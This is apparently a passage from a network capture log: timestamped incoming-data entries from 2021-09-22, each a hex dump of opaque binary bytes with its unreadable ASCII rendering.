                                        2021-09-22 19:00:55 UTC955INData Raw: b2 e1 f7 89 aa ea be dc 51 c3 9e 7c 94 fc d6 a8 b3 a7 d1 93 44 e9 aa 0b 0a 62 71 cc 92 84 cd 3d df cf c6 65 4d 32 4b 65 77 3f 59 82 54 4a ab a6 dd 36 6b 05 01 95 ef 7f 7d 4d ac 9e ee e9 be 62 11 f1 d4 58 d7 b3 ae 8d 84 6c a2 d0 be a7 38 02 91 d2 3a d3 6d 4f b3 33 43 ed dd f7 9e c1 2c 53 77 4b f5 f4 d3 0e 65 92 99 04 2c f0 19 20 e5 12 89 39 df c5 d9 3b 5c 53 4b a0 9f 5e 28 8b d5 03 29 5c e6 b6 c5 8e 4b 23 fd e6 92 4d 97 89 9f 26 79 b5 f6 87 08 4e a8 47 05 71 89 00 4d 3c 8c 0b c6 76 48 24 1b 81 8d 6a c4 5a c9 4f 68 e9 90 57 bf fb 0e 19 a1 89 37 d0 94 0b dd 54 09 f3 bc 81 ec e8 88 96 5b d1 4a 85 48 3e f1 24 85 3e e6 c4 fb eb 62 fe 84 7d 65 50 9c 69 b0 72 55 94 c7 c6 dd 0c ab 52 ec c5 06 93 be 01 ae 6f 9b 79 5d 19 7e 4f ae 86 ea 90 08 3c 4d f4 5c 43 d2 a7 f6
                                        Data Ascii: Q|Dbq=eM2Kew?YTJ6k}MbXl8:mO3C,SwKe, 9;\SK^()\K#M&yNGqM<vH$jZOhW7T[JH>$>b}ePirURoy]~O<M\C
                                        2021-09-22 19:00:55 UTC971INData Raw: 7a 88 0f cd 58 f1 b2 15 d3 21 b6 6f 37 7b 98 94 9f fa 99 c9 d6 8c 20 bb 0f 09 13 3d 14 7b f9 0d 85 b5 76 6b 6e 2a 8e 60 fa 25 4c 6f 30 17 f4 06 1a d8 1e 20 2b 73 b9 84 ca c4 9d 70 01 7a c2 bb 52 d9 40 b9 5f 91 ba 6c df ed fa 64 eb 6f 79 e5 33 66 c4 09 89 da a0 a8 56 c0 5c fa 4a 7c 02 cf 3e 1e dc a2 f9 c5 79 63 a6 90 df 5e 10 2f 23 87 88 b3 ff a2 a0 7f 40 ca 29 4a f9 94 55 31 1b c8 83 56 c5 8f d0 8f 84 fc a2 51 c8 60 31 f5 ec 4f 44 9c 1d 76 2c dd d4 49 67 7f 56 14 be 36 c7 06 a3 79 e1 be 73 76 62 9f 6a d4 81 b5 79 1c 40 d5 df df 89 a8 21 c2 da 1d 63 6f 5e 0f 81 aa 45 26 43 8c e9 90 bb 1b 38 e3 91 bb 0e cb 8a 69 01 24 bc 73 b5 e0 f3 d5 f6 92 13 24 4e 30 1f 6f db bc 11 6e d7 4b 13 24 bd 22 13 a3 c0 2b 6e 7e 52 b0 5f 37 8c 79 74 4c 85 6f 93 72 e8 7a 49 04 9a
                                        Data Ascii: zX!o7{ ={vkn*`%Lo0 +spzR@_ldoy3fV\J|>yc^/#@)JU1VQ`1ODv,IgV6ysvbjy@!co^E&C8i$s$N0onK$"+n~R_7ytLorzI
                                        2021-09-22 19:00:55 UTC987INData Raw: 76 d8 b7 e3 39 79 92 fe 81 8d c7 94 ea 61 0c 61 e0 93 e7 9a 63 15 c2 60 90 d2 cb 1a 42 a9 85 eb 4e 25 9d 23 ae 91 cc b5 49 b8 2b 69 49 f6 dc 2e 5c 46 cc 14 0c 95 56 ce 97 9a 00 f6 23 7d c5 6e c0 c2 c7 ce 46 4a fe 6d 8a 34 7e a5 70 b7 71 e1 89 d3 d5 2c ac ab 31 37 57 b2 3e d8 1b 92 b7 8c 03 ed 94 57 24 ec 64 ba 20 d7 ec 60 8a 88 e9 dd c1 e2 34 9f b5 84 ec 40 61 f7 3b 8c f6 60 bb df 4e 2b c6 a1 c6 c0 80 48 1f db d3 d5 b5 05 e6 93 11 04 07 cc fe 36 4f 9a 89 24 fe 6e 28 a2 f2 b7 d8 f3 58 85 39 c8 e9 13 ed d9 d3 23 02 2f 2a 06 fa 60 d7 eb 83 c7 95 52 81 90 5e 09 df 00 00 7c 87 4c 27 66 af 31 29 72 09 ba e8 a2 3e b0 ed 32 21 4f 93 8c 49 e6 10 b5 cc fb 5b 2c 64 e4 b0 f4 dd d7 a6 8b 5b 48 11 a9 98 fa a9 6c 41 b2 ce 8c 35 a5 5e f3 a3 9e c0 eb 59 0b 32 a0 44 7b cc
                                        Data Ascii: v9yaac`BN%#I+iI.\FV#}nFJm4~pq,17W>W$d `4@a;`N+H6O$n(X9#/*`R^|L'f1)r>2!OI[,d[HlA5^Y2D{
                                        2021-09-22 19:00:55 UTC1003INData Raw: 40 29 ee 00 56 45 7b 33 cc 08 98 2d 72 e6 40 52 f1 ee 15 d7 ff 00 82 51 17 8a 03 e3 c1 b7 3c 22 b3 9c e3 47 22 91 64 52 32 e2 97 62 27 6b 51 4b c0 4a 20 98 7e 29 78 1b 8e 2e 69 3d db 01 c6 d4 b4 41 23 ce 9b 39 be 59 63 06 f5 4b 80 2e 2e 9b 4b 6f 57 7a 58 bb 53 97 65 50 93 99 c9 72 62 88 87 85 ca 76 7a 9b e7 21 fc d2 b8 88 c5 d1 17 6d 49 45 4b b5 00 a0 b8 9e 99 2a 37 b5 71 12 e6 66 21 3a ea 7d 48 e9 7c 28 0f d5 31 c3 7c 52 61 a7 2c cd 3e cb 15 f6 8b 43 92 eb 52 56 44 93 40 ca 5e ac 03 9e b2 6c bb 0e 5e 04 89 0d 9f b6 cb 9a dd 99 ac ea 30 8e b5 71 47 55 c3 bc 5e 78 e9 35 c1 dd ed 07 82 5c 51 4c 38 aa 2e ed 4d fa 69 25 43 44 f5 da 85 45 7a 69 79 55 a9 2d 2e 6b 1b 9a 31 fc fc 4d fb c4 e8 06 7e 75 b9 c5 e2 f4 e4 14 bc 59 e0 48 a6 cb 3a 4b 2e d8 05 e8 8d a6 f8
                                        Data Ascii: @)VE{3-r@RQ<"G"dR2b'kQKJ ~)x.i=A#9YcK..KoWzXSePrbvz!mIEK*7qf!:}H|(1|Ra,>CRVD@^l^0qGU^x5\QL8.Mi%CDEziyU-.k1M~uYH:K.
                                        2021-09-22 19:00:55 UTC1019INData Raw: 72 eb 6d ae f6 22 41 ad 0c 03 0d 43 ea 45 f2 33 ea 84 8d 6e d6 c0 eb 41 a6 4a 44 3f 30 69 fc 7b 74 33 f9 cf b0 07 2d 45 8a 46 45 ee 39 84 35 ff ac 72 10 8c bb 1a 54 76 ef 73 b9 87 7a e3 bd ef 7f 00 4c 11 ae dd 39 5a e8 f7 72 b5 4e b7 28 6e b2 2e dd 64 b3 b6 57 5e b6 f0 77 7c 07 28 7d df 9c 81 00 03 04 6a fc 90 a6 a9 53 6a 9c a4 d4 98 9a 87 c6 75 02 65 a4 53 a0 19 3e d3 80 51 89 3b 7b c7 1f 17 a8 90 d0 38 3f 23 64 91 8d 80 37 e3 46 e6 f9 33 60 c4 ed f9 3d 0d c0 94 ce ad 20 5a 22 63 b9 29 96 5e 84 38 fd b8 3c 17 d5 69 cd 01 21 d1 c0 f0 3d 87 98 1f 81 56 62 13 7a 7a 45 5e a5 20 49 7c d5 ab bd 1a 4a d6 45 62 fb e0 7f 36 49 f2 3a 11 1b a3 18 af 28 a4 5f 81 db 75 c4 10 20 c3 b8 e4 c3 1a ca 3c 0c 69 2c d1 0c 3f a7 0f 95 a5 75 13 97 2c c7 c1 96 ee cb c1 f0 f4 f5
                                        Data Ascii: rm"ACE3nAJD?0i{t3-EFE95rTvszL9ZrN(n.dW^w|(}jSjueS>Q;{8?#d7F3`= Z"c)^8<i!=VbzzE^ I|JEb6I:(_u <i,?u,
                                        2021-09-22 19:00:55 UTC1035INData Raw: ca a7 46 b7 b7 d1 1d c0 ba 50 63 16 2d ce d6 0d e5 89 21 02 3e 6d 6c ba 08 dc c1 15 2e a2 8d 3d 56 3f e6 b1 ab eb 05 99 c9 6f 1c 46 07 40 61 5a 32 a9 97 22 05 95 bf 10 13 47 b0 11 7a 96 b2 a4 9e ff 72 4b 8d de a9 48 e2 79 a4 01 0b 17 93 ab 76 35 ca 7b 17 a3 ab 5d 50 09 46 55 f5 d7 ce 60 68 0c 56 d8 ee 6c 05 d4 f2 43 ca c7 d2 6f c9 ae 3d d5 3d a1 e3 0f e5 8a c4 aa 5e f8 f4 df 5f cb b3 b5 d7 a8 ce 25 99 21 a8 4c a2 f5 92 8b cf 73 5d 3a cf aa 17 b2 c4 8e 6a a1 37 48 7c 5a d6 78 a6 b9 ac 61 25 23 0a f3 8e 76 37 c1 ea a8 68 18 b3 4f 36 44 ae b9 85 b9 4f 39 52 9f f2 b8 b3 ec 9a 36 08 9f 57 45 03 99 a8 62 5f a7 37 58 97 2e 33 9f 61 ae 08 e9 71 1a 52 66 07 28 a9 1f fe 10 53 67 b2 fb d6 a1 59 a7 43 e4 9b 66 5f ff 38 18 d1 ff da 4b 4d 83 53 1d 5c 0f 72 67 8d f1 1f
                                        Data Ascii: FPc-!>ml.=V?oF@aZ2"GzrKHyv5{]PFU`hVlCo==^_%!Ls]:j7H|Zxa%#v7hO6DO9R6WEb_7X.3aqRf(SgYCf_8KMS\rg
                                        2021-09-22 19:00:55 UTC1051INData Raw: b9 5f 90 86 1b 3d 6e 25 32 23 5f 92 e8 57 59 87 e0 f1 c3 0f b6 2d 84 f3 c3 b6 06 da aa 8f e1 10 77 a3 0a a0 92 5e 01 48 7d 05 11 8f 5f 04 b4 77 3c cf 40 7f 79 64 4f 52 e9 ba 49 1d 10 7d 3c 26 4f 28 2c 88 3a 42 44 9c 19 ac ee a7 65 d0 d0 14 1b 44 78 fd a4 52 3a c7 a8 36 fb fe 64 92 e1 89 f3 9c a6 fd ac d8 a5 cd 2f 64 e4 63 1e cc 92 96 04 79 61 07 ac 66 1c cf c8 6d 5a b7 39 1a d7 fd 0d be 36 44 50 68 9b 3a 4e 26 ab d3 74 49 88 a6 30 5d 07 76 54 e7 19 5c 6e ba 6b f3 c5 88 1a 11 a7 91 f4 be ea 9d e3 4c bf ec fc 1f ca d1 55 10 e3 d0 99 d0 04 a6 36 45 4b d3 2e 1b ad a9 8d 88 0a eb 41 8c 54 c8 d9 72 82 52 43 34 b0 9b 54 dc 7a de 32 27 da 0f 07 b6 1b 02 3e 13 f0 11 df a0 47 c1 6a c2 6b 76 d9 99 8e 75 b3 49 95 62 66 71 67 4c 90 e1 e8 88 91 b0 95 68 48 b9 2c 52 84
                                        Data Ascii: _=n%2#_WY-w^H}_w<@ydORI}<&O(,:BDeDxR:6d/dcyafmZ96DPh:N&tI0]vT\nkLU6EK.ATrRC4Tz2'>GjkvuIbfqgLhH,R
                                        2021-09-22 19:00:55 UTC1067INData Raw: a2 02 87 13 c2 59 c0 57 c9 02 d6 a9 6a a1 24 ad ad 9d 56 d3 c3 30 82 3c a3 ef 5f 2d 43 bb dd 3e 07 c0 d8 d3 52 af a6 90 c8 26 40 81 f7 71 9f a2 2e 17 63 da 8a b8 ec 9c 54 13 6d e2 eb d3 5d 8b b0 ce 0d c8 31 3c ec 52 bf bd bb 6f 46 d3 59 1d e8 61 25 12 f5 f5 44 7c ff db 9e 23 b9 c3 a5 85 9d 7a 32 3c 1c 62 56 e2 21 6e 20 d3 8c d0 28 3c 0e 0a 2b a0 d5 96 d1 29 cd e8 c0 ad e8 a6 2f 9b c4 89 4a bc ea c4 64 07 88 9c fd 34 49 2b b1 71 91 e0 5e 31 62 4f 55 98 9e 20 51 99 9e 43 04 db b2 65 b1 b3 a4 03 83 5c 39 fe cc 5b fa a9 22 b8 48 9c c9 cc 04 db 26 75 94 0c c6 42 28 a9 db 3a d9 aa 54 cd ce 4c 3c 27 f5 2c 30 bb aa 74 bb 34 c2 d6 55 d7 75 f0 89 13 7f ff 7d 03 2a bd dd 69 ab 4e b8 78 fc 1e 8e 1a 65 af a6 95 0b fe 6e 50 b9 13 62 f0 c5 40 89 af 5f 26 d6 2c f7 65 89
                                        Data Ascii: YWj$V0<_-C>R&@q.cTm]1<RoFYa%D|#z2<bV!n (<+)/Jd4I+q^1bOU QCe\9["H&uB(:TL<',0t4Uu}*iNxenPb@_&,e
                                        2021-09-22 19:00:55 UTC1083INData Raw: c6 a1 3b 2b eb c8 a1 d0 b0 3c 96 10 02 8d f1 5a c9 a7 27 b5 16 b5 44 60 10 ef 42 58 12 11 bb 32 db 12 f3 b0 0d 27 b7 24 56 12 86 a2 7a 48 c1 4d ef b4 02 70 f7 a1 dd 6d f4 dd 9e ea fd 56 29 19 d1 2b 5c 91 bf 05 5d e1 b9 c7 79 8b 44 91 26 af fd 49 3d a2 41 70 aa b0 b1 ed 1b 82 e5 2e cc 68 17 f0 87 70 c0 ba 7e 8e 71 5b 28 d0 bd a2 bb 62 64 8b 19 8a b7 47 44 78 e1 d7 0a 82 a4 ff d9 98 ee 8f ce fd 2c 0e 01 5c c0 89 b6 9c 96 8c 84 8a 98 0e df de a6 f6 e9 33 74 bd 99 0c 84 05 7d d8 34 fe 53 89 04 c8 c0 e0 4d 51 54 be 4a 1b 3e ce 17 c5 80 02 3c c8 77 a8 4b b8 fc 7a a4 3a 8e c9 5c 03 86 c9 90 aa d1 52 7d 6f 3d 4e 8f f0 24 fd 9c c1 f1 d0 12 99 67 f9 25 ac 2b 8f 7e b8 f8 5e a3 ec a3 ce c4 57 a5 ce 15 36 ba 77 96 a5 77 2d 91 5c 0e 30 d7 74 f8 54 d4 7d 0f 17 f6 35 f5
                                        Data Ascii: ;+<Z'D`BX2'$VzHMpmV)+\]yD&I=Ap.hp~q[(bdGDx,\3t}4SMQTJ><wKz:\R}o=N$g%+~^W6ww-\0tT}5
                                        2021-09-22 19:00:55 UTC1099INData Raw: 10 43 7c 7d 06 16 27 c5 14 95 e6 ca 3c f4 fa 63 91 02 e1 fc 28 1c 5b 5e 3b 8e 95 2d ac 46 49 b3 6e bc 6e 55 1f fc c8 3b e2 d0 7d 9d b6 3d ff ce 46 5e 7a a8 4b 91 ab 6e f7 4d df 64 2f 9d 91 5f 8f 3a a4 8d 57 a9 10 67 d6 85 b8 6f fd a8 31 ac ad ee 4f 04 56 71 4d de ba 8d dc 21 e8 dc 93 2b 9b 77 f3 24 a5 e2 04 72 23 47 53 97 92 29 f1 c0 0b e9 3c f2 f9 7b 06 68 39 e8 aa 24 1c b1 0c e2 63 6a c6 32 da f1 ff d5 ee 2f af 4d 88 90 50 aa 11 be 56 cf 9f 7d b7 c2 bd f3 12 76 56 78 96 bc b3 30 99 5f 44 61 1c 20 35 c9 ba 7b c2 ee f9 6d 9e 74 5d 38 12 e8 a8 7e 2b 72 c7 96 9a 9c 67 a1 51 fb 2e 1c 10 ab e0 5a 47 64 5a 7c af d9 cb e0 89 b6 1b 89 de 42 d9 21 12 fe 8d 3d af 8f 64 ab 5a 7c 20 fa cc 0e e0 b7 dc e9 22 c0 20 c1 80 bf 7f 25 c0 69 94 38 5a 60 98 da 97 d3 6d 0a 5c
                                        Data Ascii: C|}'<c([^;-FInnU;}=F^zKnMd/_:Wgo1OVqM!+w$r#GS)<{h9$cj2/MPV}vVx0_Da 5{mt]8~+rgQ.ZGdZ|B!=dZ| " %i8Z`m\
                                        2021-09-22 19:00:55 UTC1115INData Raw: 9b 93 18 d3 e8 14 e3 f6 80 a9 a0 99 9d cf 6e 04 50 bd 6a 90 43 cc d4 5a 70 e9 93 10 11 3a 98 73 65 cd db 63 89 c8 89 b8 3a 82 d8 f5 44 4f 20 69 b6 a2 9d 01 5e e1 d5 b8 40 d7 9b ea fc 1f 11 71 7c 34 50 6f e2 35 78 89 c7 49 a8 0b b5 03 fe 9a 79 63 b7 a7 69 7b c7 a8 36 a2 42 74 3f 55 c4 8f 4f ff 5c 08 bb 52 ca 69 24 9e 85 fd 7b 68 d0 f1 12 3d 03 e2 e7 60 9c 35 fb 5c f2 ad 44 84 93 6f 11 67 32 f2 1c 2c 90 ae f3 53 d2 61 be 68 f5 7e bc 52 b3 71 bc 91 06 e0 24 e0 47 81 a8 58 b6 99 83 9b f1 25 14 7b 07 d5 fb a3 00 92 6d 59 06 d0 27 cb b8 21 fd de 49 d6 f0 80 fb c5 d1 a2 a3 17 85 2d 0d fc 87 d6 f9 68 e2 e1 1b 72 fc d6 8e 41 77 d1 1b 58 e0 53 60 6a ce 13 aa a6 ce a0 3f c1 5c fe b3 2d 3c d2 5d d5 74 59 28 28 25 41 f1 46 2c 62 d9 05 75 21 26 11 39 08 ca c0 20 0d 3c
                                        Data Ascii: nPjCZp:sec:DO i^@q|4Po5xIyci{6Bt?UO\Ri${h=`5\Dog2,Sah~Rq$GX%{mY'!I-hrAwXS`j?\-<]tY((%AF,bu!&9 <
                                        2021-09-22 19:00:55 UTC1131INData Raw: 3d df 4b d0 38 88 bf 0d e5 37 06 07 3c 53 e9 a2 45 5e 23 aa 58 7b e1 ab f2 ab 69 00 1a 40 86 12 47 7d d1 b9 4b 47 aa ce e9 fd 0d 39 28 e6 89 98 ed bd 82 33 d7 15 34 a3 44 fa 29 97 d5 6d fa da 33 ac 6e 79 08 46 16 ad 59 85 ac c2 c0 03 16 04 2b b3 47 bc bc 90 e8 af 80 4b 35 78 74 35 73 65 fc 3f 85 22 46 72 48 e5 75 3e 5c ee d8 49 3c 48 c8 3c 67 d9 10 65 86 dd c5 60 59 c4 c0 b5 a3 d6 9c 2a 0a 2b fe 3c 7a 78 64 2e 94 50 54 15 3a 18 82 80 80 27 0d 87 26 24 3c 4f 28 d7 25 63 bd 49 e3 0b fb 2e c8 97 0d 3e 19 3b f7 fd 5f 1e 32 57 a1 03 60 9d 2e 7f 16 8d fe e1 53 ea a1 36 93 ec 2f e6 d3 ec f2 c3 db e8 82 f8 cd b6 0d a4 ac 93 72 f6 74 75 5d 17 06 cd 32 cb 7c b4 e5 e5 d8 9e 79 c5 80 8d 0a e6 f4 8a 0f a7 79 61 57 6b 99 3a 23 66 cd 41 a1 58 6e e0 77 a2 16 e4 7b 7b 18
                                        Data Ascii: =K87<SE^#X{i@G}KG9(34D)m3nyFY+GK5xt5se?"FrHu>\I<H<ge`Y*+<zxd.PT:'&$<O(%cI.>;_2W`.S6/rtu]2|yyaWk:#fAXnw{{
                                        2021-09-22 19:00:55 UTC1147INData Raw: 48 ce a4 3f dc 51 93 33 3b 88 c5 f3 f5 9a 87 8b 05 d8 be 0a 69 52 45 6a ad 9c 10 fa be df 56 a6 3e a8 41 b0 e7 89 65 a9 72 11 b2 86 5f 04 16 10 5c e4 23 45 68 05 f6 56 47 35 a9 23 c7 1a 00 83 95 41 d5 e2 94 22 aa 09 3d f5 80 4f 70 b7 6b 5a 6d 28 e6 52 b5 6e e3 f4 80 92 4b 38 7e f9 1e 4c de 19 d5 8f 44 b0 fc 84 e5 35 27 a5 23 5b b1 ba 5e e6 ef 82 a9 74 56 41 10 94 10 ed bb 0a 64 1a 2d 3d 51 55 b6 77 65 0f 92 aa 37 81 9d a6 36 a9 0c bf b2 3a e9 76 6f c2 58 72 a6 ea 0a bb 57 43 b6 05 a1 85 a4 9b 0f 1d d8 c6 03 88 a4 2a d1 42 f8 8f b0 09 fa 1c 56 78 c6 c4 c4 c8 41 e4 dc 2c e3 1f 7e 1f 49 24 2b 65 49 23 43 42 e6 5b 01 0e b4 5a 13 ed c8 82 26 b0 87 99 a5 1b ae 5e c5 9d c7 19 bb 93 cc b8 34 8b 4c 61 96 4c cc 22 6e bc 46 4c e8 d2 12 23 cc e0 b9 0c 25 bb 2c 61 95
                                        Data Ascii: H?Q3;iREjV>Aer_\#EhVG5#A"=OpkZm(RnK8~LD5'#[^tVAd-=QUwe76:voXrWC*BVxA,~I$+eI#CB[Z&^4LaL"nFL#%,a
                                        2021-09-22 19:00:55 UTC1163INData Raw: aa 7a b8 f0 d0 9b 03 25 a9 18 6c 01 30 d1 b2 85 1a 7d d7 91 ac 78 9b 7e 62 78 31 2c cc 1a bd 47 fb 9a 76 8e cb 02 3e 6c 6c 57 d6 2e 04 b9 e0 b6 e1 b6 5d a1 ec 9c cf 52 33 71 b0 40 86 fa dc d2 e4 c9 96 f3 85 76 24 d2 47 37 c2 88 3c 02 43 0e d4 52 60 07 2e 8b de 76 c9 40 8f 97 96 2d 22 99 34 ed d6 9a db cb 18 3f ea 80 e6 31 ad 6e 2e ce a2 40 96 e7 cb bf 76 96 bf f2 24 1f bb 79 06 d2 64 55 2e bd 0a 3b 21 de 5e d9 ab 4c 5b 31 bb 41 30 00 21 9f a5 53 77 d5 b4 d8 6a 9f b7 23 de 34 52 46 f6 f0 5e 40 3a a9 56 ab d1 9b 84 0b 27 c1 cf bc b6 47 6d 87 d2 c2 a6 a5 f5 38 aa 68 99 47 ab ed 6b c4 b8 28 79 b6 80 e0 2c ce 23 6a 40 72 e8 2e 81 a6 05 f4 94 23 ff c0 45 ea 95 ce e6 dd b0 64 9c 8e 06 5c 30 1f dd ba 48 f7 75 e5 50 42 11 83 dd 8d d4 60 e4 8b b3 30 14 cc 94 39 7e
                                        Data Ascii: z%l0}x~bx1,Gv>llW.]R3q@v$G7<CR`.v@-"4?1n.@v$ydU.;!^L[1A0!Swj#4RF^@:V'Gm8hGk(y,#j@r.#Ed\0HuPB`09~
                                        2021-09-22 19:00:55 UTC1179INData Raw: 0e 7c 87 25 55 b7 fc ba 0e f2 72 4b 13 08 12 e8 e7 dd af c9 80 db 72 60 8c fd 35 e1 ed 04 ba b2 9c 08 85 e8 94 9c 80 ec 6d d6 91 37 30 2d b6 7c fc 9a 09 8e 13 a0 3c 8e 91 87 a4 c6 95 dd f6 2f 4c 21 bc 6b 03 19 8e c6 d7 5d e7 2e 31 95 8d dc a6 6f a9 61 5c a8 5c 29 a9 3b ff eb af c7 7f 43 ef d5 06 65 42 dd 8b e9 1b 7b 90 ee d6 1e a8 65 4f 7c 60 b9 fa 65 23 6a b3 ea d3 a9 be 0f 5c d0 88 e9 fc d0 42 f9 34 50 a4 99 bc af f4 f4 ee 5a c0 6c 89 49 be 83 0d 1e e4 f4 51 29 88 45 e5 0e e1 73 e7 28 8d 84 97 c1 84 d4 e2 8d 12 33 42 9b 3a bb 52 88 9a 18 8d 80 9c fe 1b 4f 9a 5b 7c 9b 65 4e 8f 22 03 c2 92 6a 95 ac 5c fb bd d8 e5 bb 23 a7 b5 70 79 14 06 b4 3b b4 c7 aa ba 67 ec 9a ac 38 27 e6 cc 9b e9 84 9a 7d fa 00 67 96 d3 c0 e5 c1 47 6f e9 2c c4 c7 c9 9e e6 3d 5d cd 46
                                        Data Ascii: |%UrKr`5m70-|</L!k].1oa\\);CeB{eO|`e#j\B4PZlIQ)Es(3B:RO[|eN"j\#py;g8'}gGo,=]F
                                        2021-09-22 19:00:55 UTC1195INData Raw: 4b 7c 14 32 85 9c 1a 8e 96 a4 0a c8 d3 55 5f bf 79 5b f0 d9 f3 4c bd 28 b3 87 c6 b3 08 b8 4b 0c 88 92 55 db 34 1e 02 ee 4f 44 59 fe 5d 09 cc 1f a7 18 75 16 ce 5e 77 97 55 8a 7b 76 de ff 0a 62 7c 18 ad 07 83 3c ae 6c a1 92 c7 66 63 6c 6a 6f 23 a2 2d 1d d0 31 d7 53 df 87 6c ff 1e 93 3a f5 d3 fe e2 b2 6e 1c f3 e4 09 f0 9b ff ac ef 2e b5 1f 25 2c 00 d3 a5 39 80 6b b4 81 b9 71 b6 b2 ca c2 44 58 3c 6b a2 b2 99 5f 99 b7 15 6b bd bf d4 29 d2 40 09 58 09 9f c2 1f 9a 1e d2 95 91 b4 5c fa 23 12 0e cf 30 81 15 06 0d 4f 51 73 c9 88 d5 af 7b 7d 71 c0 9d 66 fa 7b 9b 79 f2 27 2c 37 2e 36 7e 3c 75 2c 2d bf 4d 6e 5a b1 b8 6d 2b 37 8e cb ff cc ff 5e ab 61 ca c0 71 9b 0f fe bf 8c 66 98 11 43 08 66 a7 23 fc d9 51 55 c4 d4 e7 b6 c8 b1 8d 95 0f 04 28 ff 80 b6 3e 2c ee 59 32 e7
                                        Data Ascii: K|2U_y[L(KU4ODY]u^wU{vb|<lfcljo#-1Sl:n.%,9kqDX<k_k)@X\#0OQs{}qf{y',7.6~<u,-MnZm+7^aqfCf#QU(>,Y2
                                        2021-09-22 19:00:55 UTC1211INData Raw: 78 e2 39 04 d8 35 c8 cf 79 0d f8 a4 e6 a0 41 2f c0 ba 54 9a a1 45 a9 9c 73 22 08 71 39 c9 a3 d3 ae 25 a9 27 29 4f c4 8a 8e 6a 1c 51 33 97 d6 be 70 68 29 94 ed 7c c6 71 b5 50 09 36 8c 12 64 19 a5 10 5c 63 4c c8 fd 2f 4f 1b 32 1b 7e 3b 7b b9 32 2d fb 4c 16 6e 5d 26 a6 b7 b1 22 0c ed 12 d8 3e 3d 1c fa 50 82 2f 4f 85 a6 89 72 86 24 a0 85 b4 37 f1 50 69 fb 8b 8e a9 38 28 13 d0 1a 9e 3d 03 4a 43 46 d8 78 a6 76 a9 80 71 4c 32 eb 5d 28 6e aa 98 b0 b4 1c 75 c0 2b 42 d8 91 45 f4 5f ca 84 c5 72 af 91 20 6d ec 9b 40 76 96 25 00 14 5b ea c3 9a 50 22 fc 86 44 39 aa 2d 7d 17 df ec 05 a3 00 5f ab c7 5c 8a 81 2f fc be 90 d3 22 0a 32 9b 62 df 34 e0 a8 f8 f7 c2 10 45 14 22 a9 2d b6 6f aa b6 ee e1 b4 42 95 4f 78 76 90 7d bd 3f d8 f8 9e a7 d0 c8 e9 1f 94 6f 91 2b 12 88 a0 14
                                        Data Ascii: x95yA/TEs"q9%')OjQ3ph)|qP6d\cL/O2~;{2-Ln]&">=P/Or$7Pi8(=JCFxvqL2](nu+BE_r m@v%[P"D9-}_\/"2b4E"-oBOxv}?o+
                                        2021-09-22 19:00:55 UTC1227INData Raw: 4a e1 7d 2c 8e 60 77 e7 00 32 5d 25 54 d2 b1 b7 66 56 fb 92 b0 d3 c4 05 20 82 3b 15 17 a4 30 78 8d dd ae 29 ad 57 32 ae 03 e7 93 11 1a e0 6a f6 88 71 db 0b 8e a8 3f 08 60 11 31 f3 1b 3b f4 28 f4 4d 58 99 88 0a fd 30 44 23 8c f4 5d 12 42 8b 20 5f 69 b7 d0 f2 08 22 0d 26 c8 8f 6c 25 bd 3c 67 69 10 cc e0 6e f3 5c 68 ef cf e4 e1 70 19 d9 07 50 f0 21 fe f6 fb 95 12 14 06 a9 7a 11 ab 5b d6 b0 77 d9 2e cf 7d 34 f1 a0 85 39 d9 39 31 7c 6a d4 43 d1 76 56 fb f0 1c 58 0e f0 6b 07 52 d4 cc bf 67 e2 43 2f ea 7c bd 61 72 87 27 40 ab cd 82 be b5 22 a9 82 4c d7 73 0e c8 b9 ed 67 67 64 c9 54 86 cb c3 6f 88 09 e2 f2 8a 17 46 e0 2f bc 71 44 25 e1 76 c2 83 29 77 00 6c 4a 1a fd 55 4b 51 49 1e 8f b5 a5 e8 24 95 36 70 9d dc 56 ae b5 68 7b d9 3b eb d0 03 53 b1 bb 11 ef ad 3e 39
                                        Data Ascii: J},`w2]%TfV ;0x)W2jq?`1;(MX0D#]B _i"&l%<gin\hpP!z[w.}4991|jCvVXkRgC/|ar'@"LsggdToF/qD%v)wlJUKQI$6pVh{;S>9
                                        2021-09-22 19:00:55 UTC1243INData Raw: d8 4a 2b 4c dc 9b c6 b4 66 d7 60 2b 4f 25 c6 3f 57 c5 c9 1b e8 34 0b b0 6a 22 1f 36 14 b2 98 2f 62 41 70 1d 0c 68 c3 68 8d b4 27 27 11 ad 6c b4 ae f8 74 64 46 90 cc 63 c9 24 87 e1 e8 fb 99 6f eb f0 4b 1c 9f ae 2a 54 93 f1 2a 10 da 6a d0 08 06 2d a3 92 58 c8 9d 36 17 71 ab f3 52 23 59 ce b6 c7 a3 1d fc 20 57 18 fe 19 2e 1b 97 e3 0b 3b 5f 71 11 a5 22 89 c7 cd 74 ac 4d f4 fd bd 76 5c a8 92 fc 93 d8 39 08 aa 7e c4 32 8e 3e 33 6c e2 01 6f 4f b2 60 05 b4 73 56 8f d9 a6 c6 d6 81 44 78 b8 7c 61 f4 9e 4a 4d d8 8d ca 95 21 49 a4 c3 ba fb 1d d2 42 8a 2c 0a 8e 51 3e bc 1a d2 b0 e4 c0 0f 49 9e 54 5e 18 80 f5 b7 30 8a c5 f4 c6 aa 3c cb aa 55 33 a4 a9 08 18 dc c8 94 61 4c a6 1a be f0 2b 62 1a 5c 9f 9d e3 2c cb 3a 3a 99 8d 8d f8 60 60 85 cc 5a e6 6b 19 28 f3 45 9e c3 ee
                                        Data Ascii: J+Lf`+O%?W4j"6/bAphh''ltdFc$oK*T*j-X6qR#Y W.;_q"tMv\9~2>3loO`sVDx|aJM!IB,Q>IT^0<U3aL+b\,::``Zk(E
                                        2021-09-22 19:00:55 UTC1259INData Raw: 46 4a 6a 89 6f 7e 49 a0 28 7f 4d b2 5b ca 56 53 d1 d0 7c af 02 d9 5e 76 bb cd bc a1 91 e2 93 71 5b 6e e4 55 99 5d 4c 9e 70 00 d2 16 36 a0 21 ab a9 e2 9e bc 1b a2 99 6a 05 59 f1 52 ea 50 2d 89 f9 cd aa 94 ed e0 81 ff 48 5b b1 54 32 8d cb aa 0a ff 2d ce 98 d9 29 4b 85 8a 5a 26 82 ad 3b 69 43 1b ca b3 c6 f7 1b f9 c8 da bb cc 7c 39 67 bc 1f 5c 6d 3f f5 a8 66 68 bf 27 e7 b9 ec 7a c7 d7 d8 a7 0a 92 3f fa cc 42 cc 29 29 f0 6a f4 ef af ef f9 ce a2 fb eb 96 96 b0 5d a7 14 78 99 dd 33 02 93 d5 8e b8 46 90 a0 93 75 63 1c 05 40 72 5e 5e c3 72 c0 c3 c7 40 53 0f 2d 47 aa bf 7d a4 0b ce 14 66 c1 21 06 5d 89 00 84 b8 7f 51 8f cb df 06 7e 14 c6 31 c2 fe 60 35 4f 62 3f 72 4b 90 be 